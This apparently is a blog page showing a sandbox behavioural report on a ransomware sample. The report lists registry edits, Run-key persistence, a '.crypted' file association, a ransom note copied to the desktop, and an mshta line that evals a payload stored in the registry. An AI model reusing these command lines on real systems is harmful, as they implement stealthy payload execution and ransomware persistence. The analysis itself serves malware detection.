![]() ![]() "wscript.exe" (Access type: "DELETEVAL" Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS" Key: "PROXYSERVER") "wscript.exe" (Access type: "SETVAL" Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS" Key: "PROXYENABLE" Value: "00000000") Spawned process "powershell.exe" with commandline "iex $env:maqd" ( Show Process) Spawned process "mshta.exe" with commandline "javascript:dy1Ze="MQu3V" h2s3=new ActiveXObject("WScript.Shell") Lr3wQccZ="jpCGxF" uPR3t=h2s3.RegRead("HKCU\\software\\qSIFiaX64\\FtHYf2x") nOi7FF6="tR3" eval(uPR3t) YOQA8="KeCW2" " ( Show Process) Spawned process "cmd.exe" with commandline "/c DEL "%TEMP%\php4ts.dll"" ( Show Process) Spawned process "cmd.exe" with commandline "/c DEL "%TEMP%\a.exe"" ( Show Process) Spawned process "cmd.exe" with commandline "/c DEL "%TEMP%\a.php"" ( Show Process) Spawned process "notepad.exe" with commandline ""%TEMP%\a.txt"" ( Show Process) Spawned process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" ( Show Process) Spawned process "cmd.exe" with commandline "/c notepad.exe "%TEMP%\a.txt"" ( Show Process) Spawned process "a.exe" with commandline ""%TEMP%\a.php"" ( Show Process) Spawned process "reg.exe" with commandline "REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"%TEMP%\a.txt\""" ( Show Process) Spawned process "reg.exe" with commandline "REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"" ( Show Process) Spawned process "reg.exe" with commandline "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "%TEMP%\a.txt"" ( Show Process) Spawned process "cmd.exe" with commandline "/c %TEMP%\a.exe "%TEMP%\a.php"" ( Show Process) Spawned process "cmd.exe" with commandline "/c copy /y "%TEMP%\a.txt" "%USERPROFILE%\Desktop\DECRYPT.txt"" ( Show Process) Spawned process "cmd.exe" with commandline "/c copy /y "%APPDATA%\Desktop\DECRYPT.txt"" ( Show Process) Spawned process "cmd.exe" with commandline "/c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"%TEMP%\a.txt\""" ( Show Process) ![]() Spawned process "cmd.exe" with commandline "/c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"" ( Show Process) Spawned process "cmd.exe" with commandline "/c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "%TEMP%\a.txt"" ( Show Process) Spawned process "wscript.exe" with commandline ""C:\f"" ( Show Process) ĭetected text artifact in screenshot that indicate file is ransomware
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |